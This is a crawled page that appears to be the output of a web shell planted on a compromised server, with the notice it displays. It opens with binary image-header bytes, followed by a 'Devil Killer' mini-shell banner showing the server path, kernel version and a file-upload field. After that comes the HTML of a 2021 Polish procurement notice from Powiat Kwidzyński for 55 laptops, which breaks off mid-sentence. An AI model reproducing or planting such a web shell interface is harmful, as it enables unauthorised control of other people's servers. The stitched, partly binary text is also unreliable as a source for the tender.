JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210520/0006026502-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00060265 z dnia 2021-05-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Tryb podstawowy -wariant I ( bez negocjacji) pn. zakup wraz z dostawą sprzętu elektronicznego w r.p.Podniesienie jakości szkolnictwa zawodowego w powiecie kwidzyńskim -większa zatrudnialność uczniów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kwidzyński- Starostwo Powiatowe w Kwidzynie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192644760</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 29B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kwidzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiatkwidzynski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.powiatkwidzynski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Tryb podstawowy -wariant I ( bez negocjacji) pn. zakup wraz z dostawą sprzętu elektronicznego w r.p.Podniesienie jakości szkolnictwa zawodowego w powiecie kwidzyńskim -większa zatrudnialność uczniów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0e865c8c-b954-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00060265</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000767/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.15 Zakup sprzętu komputerowego( laptopy) tablice multimedialne, w ramach projektu „ Podniesienie jakości szkolnictwa zawodowego w powiecie kwidzyńskim- większa zatrudnialność uczniów”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Podniesienie jakości szkolnictwa zawodowego w powiecie kwidzyńskim – większa zatrudnialność uczniów” . Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl; www.bip.powiatkwidzynski.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Obsługa komunikacji w formie<br/>elektronicznej pomiędzy Zamawiającym a Wykonawcami oraz składanie ofert odbywa się przy użyciu:-https://miniportal.uzp.gov.pl -<br/>https://epuap.gov.pl/wps/portal;_oraz_poczty_elektronicznejz_zastrzezeniem_ze_zlozenie_oferty_nastepuje_wylacznie_przy_uzyciu_miniPortalu,_ePUAPu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Informacje ogólne. 1.1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzieleniezamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAPma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lubwniosku” oraz do „Formularza do komunikacji”.1.2. Wymagania techniczne<br/>i organizacyjne wysyłania i<br/>odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń orazinformacji przekazywanych przy ich użyciu opisane zostały<br/>w Regulaminie korzystania z systemuminiPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej(ePUAP). 1.3.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>"Formularz złożenia, zmiany, wycofania oferty lub wniosku" i "Formularz do komunikacji" wynosi 150MB.1.4. Za datę przekazania oferty, wniosków,<br/>zawiadomień, dokumentów elektronicznych,oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się<br/>datę ich przekazania na ePUAP.1.5. Zamawiający przekazuje link do postępowania oraz IDpostępowania jako załącznik nr 9 do SWZ. Dane<br/>postępowanie można wyszukać również na Liściewszystkich postępowań w miniPortalu klikając wcześniej opcję "Dla Wykonawców" lub ze strony<br/>głównej z zakładki Postępowania.2. Złożenie oferty.2.1. Wykonawca składa ofertę za pośrednictwem"Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku" dostępnego na ePUAP iudostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla<br/>wykonawców na miniPortalu, w szczegółach danego postępowania. W formularzu<br/>oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będziekorespondencja związana z postępowaniem.2.2. Ofertę<br/>należy sporządzić w języku polskim. 2.3.Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznejopatrzonej<br/>podpisem zaufanym lub podpisem osobistym. 2.4. Sposób złożenia oferty, w tym<br/>zaszyfrowania oferty opisany został w "Instrukcji użytkownika", dostępnej na stronie:https://miniportal.uzp.gov.pl/2.5. Jeżeli dokumenty elektroniczne,<br/>przekazywane przy użyciu środkówkomunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu<br/>przepisów ustawy z dnia 16 kwietnia 1993 r. a zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r.poz. 1913), wykonawca, w celu utrzymania w poufności<br/>tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem polecenia "Załącznik stanowiący<br/>tajemnicę przedsiębiorstwa" a następnie wraz z plikami stanowiącymi jawną część należy ten plik zaszyfrować.2.6. Do oferty należy dołączyć<br/>oświadczenie o niepodleganiu wykluczeniu lub kryteriów selekcji, w zakresie wskazanym w załączniku nr 4 doSWZ, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę. 2.7. Oferta może być<br/>złożona tylko do upływu terminu składania ofert.2.8. Wykonawca może przed upływem terminu do składania ofert wycofać ofertę za pośrednictwem<br/>"Formularza do złożenia, zmiany, wycofania oferty lub wniosku" dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób wycofania oferty<br/>został opisany w „Instrukcji użytkownika" dostępnej na miniPortalu2.9. Wykonawca po upływie terminu<br/>do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.3. Pozostałe informacje, w tym dotyczące sposobu komunikowania się<br/>zamawiającego z wykonawcami (nie dotyczący składania ofert) znajdują się w rozdziale XVI SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia2016 r. w sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy,że:1)administratorem Pani/Pana danych osobowych jestStarosta Powiatu Kwidzyńskiego zsiedzibą w Starostwie Powiatowym w Kwidzynie onastępującychdanych kontaktowych: 82-500 Kwidzyn, ul. Kościuszki 29b, email: IOD@powiatkwidzynski.pl.2)administrator wyznaczył Inspektora DanychOsobowych, z którym możnasię kontaktować pod adresem e-mail: IOD@powiatkwidzynski.pl.3)Pani/Pana dane osoboweprzetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia klasycznego, prowadzonym w trybie podstawowym pn.zakup i dostawa sprzętu elektronicznego w ramach<br/>projektuPodniesienie jakości szkolnictwa zawodowego w powiecie kwidzyńskim- wieksza zatrudnialnosc uczniów o nr sprawy: ORIV.272.03.2021 odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.5)Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata,okresprzechowywania obejmuje cały czas trwania umowy;6)obowiązek podaniaprzez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiemustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego.7)w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.8)posiada Pani/Pan:a)napodstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (stosownie do brzmienia<br/>przepisu art. 75 ustawy pzp- w przypadku korzystania przez osobę, której dane osobowe sąprzetwarzane przez zamawiającego, z uprawnienia, o którym<br/>mowa w art. 15 ust. 1-3 RODO,zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,mających na celu sprecyzowanie nazwy lub datyzakończonego postępowania o udzielenie zamówienia);b)na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (stosowniedo brzmienia przepisu art. 76 ustawy pzp- skorzystanie przez osobę, której dane osobowesą przetwarzane, z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o których mowa w art. 16 RODO, nie może naruszać integralności protokołu oraz jego załączników);c)na podstawie art.<br/>18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych zzastrzeżeniem okresu trwania postępowania o udzielenie<br/>zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO;d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Panadotyczących narusza przepisy RODO; 9)nie przysługuje<br/>Pani/Panu:a)w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;b)prawo do przenoszenia danych osobowych, o którym<br/>mowa w art. 20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzaniadanych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust.1 lit. c RODO; 10)przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych<br/>Osobowych, ul. Stawki 2, 00-193 Warszawa.11)Stosownie do brzmienia przepisu art. 19 ust. 5 ustawy pzp- Zamawiający przetwarzadane osobowe<br/>zebrane w postępowaniu o udzielenie zamówienia w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W nawiązaniu do powyższego obowiązku informacyjnego,<br/>a także rozdziału XXXVIII SWZ:- na podstawie art. 16 RODO prawo do sprostowania Pani/Panadanych osobowych (stosownie do brzmienia przepisu art.<br/>19 ust. 2 ustawy pzp- skorzystanie przezosobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa<br/>w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia anizmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawąPZP/ stosownie do brzmienia przepisu art. 76 ustawy pzp- skorzystanie przez osobę, której dane<br/>osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, októrych mowa w art. 16 RODO, nie może naruszać<br/>integralności protokołu oraz jego załączników);- na<br/>podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danychosobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lubkonkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (stosownie do brzmienia przepisu<br/>art. 19 ust. 3 ustawy pzp- w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczeniaprzetwarzania, o którym mowa w art. 18 ust. 1 RODO,<br/>nie ogranicza przetwarzania danych osobowychdo czasu zakończenia tego postępowania nie ma zastosowania w odniesieniu do przechowywania, wcelu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osobyfizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lubpaństwa członkowskiego). Informacja obejmująca powyższy obowiązek informacyjny, a takżeprzedmiotowe<br/>ograniczenia stosowania znajduje się również w rozdziale XXXVIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.IV.272.03.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest zakup wraz dostawą fabrycznie nowego sprzętu elektronicznego 1): dostawa laptopów wraz z oprogramowaniem – 55 szt.<br/>2. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31710000-6 - Sprzęt elektroniczny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Opis przedmiotu zamówienia załącznik nr 1 do SWZ – wykonawca wypełnia w części dotyczącej oferowanych parametrów technicznych<br/>przedmiotu zamówienia. Przedmiotowy środek dowodowy służy ocenie zgodności zaoferowanych parametrów technicznych z opisem<br/>przedmiotu zamówienia. Wypełniony załącznik nr 1 do SWZ Wykonawca składa wraz z ofertą<br/>2. Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne,<br/>Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>3. Gdy przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub,<br/>pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania,<br/>Zamawiający nie wezwie Wykonawcy do ich złożenia lub uzupełnienia.4. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych . <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Opis przedmiotu zamówienia załącznik nr 1 do SWZ – wykonawca wypełnia w części dotyczącej oferowanych parametrów technicznych<br/>przedmiotu zamówienia. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>Na ofertę składają się następujące dokumenty:1.Formularz ofertowy–przygotowany wg. wzoru-załącznik nr 3 do SWZ2.Formularz cenowy-przygotowany wg. wzoru–załącznik nr 3a do SWZ3.Oświadczenie o niepodleganiu wykluczeniu w postepowaniu- przygotowany wg. wzoru-załącznik nr 4 doSWZ.4.Pełnomocnictwo/pełnomocnictwa dla osoby/osób podpisujących ofertę,jeżeli oferta jest podpisana przez pełnomocnika (jeżelidotyczy).5.Opis przedmiotu zamówienia załącznik nr1 do SWZ–wykonawca wypełnia w części dotyczącej oferowanych parametrówtechnicznych przedmiotu zamówienia6.W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówieniapełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia,ewentualnie umowę owspółdziałaniu,z której będzie wynikać przedmiotowe pełnomocnictwo.7.Oświadczenia i/lub dokumenty na podstawie,których Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie,stanowiących tajemnicę przedsiębiorstwa,w rozumieniu przepisów o<br/>zwalczaniu nieuczciwej konkurencji,(jeżeli Wykonawca zastrzega takie informacje).2.Informacje o formalnościach w celuzawarciaumowy.2.1.Zamawiający zawiera umowę w sprawie zamówienia publicznego, z uwzględnieniem art.577 ustawy pzp,w terminie nie krótszym niż<br/>5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało przesłane przy użyciu środkówkomunikacji elektronicznej,albo 10 dni-jeżeli zostało przesłane w inny sposób.<br/>Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa wyżej, jeżeli w postępowaniu o<br/>udzielenie zamówienia prowadzonym w trybie podstawowym złożono tylko jedną ofertę.2.2.Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem<br/>umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.2.3.Przed podpisaniem umowy wybrany<br/>wykonawca przekaże zamawiającemu informacje niezbędne do wpisania do treści umowy(np. imiona i nazwiska upoważnionych osób, którebędą reprezentować wykonawcę przy podpisaniu umowy).2.3.Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminiewskazanym przezZamawiającego.2.4.Przed podpisaniem umowy wybrany wykonawca przekaże zamawiającemu następujące dokumenty:2.4.1.Certyfikaty:Deklaracja zgodności CE.Wykonawca zobowiązany jest przed podpisaniem umowy dostarczyć Zamawiającemu wymaganedokumenty (instrukcje, materiały dotyczące użytkowania, deklaracje zgodności CE) zgodnie z treścią opisu przedmiotu zamówienia.2.4.2.Wymógdostarczenia przez Wykonawcę konkretnego systemu operacyjnego jest uzasadniony istniejącą infrastrukturą 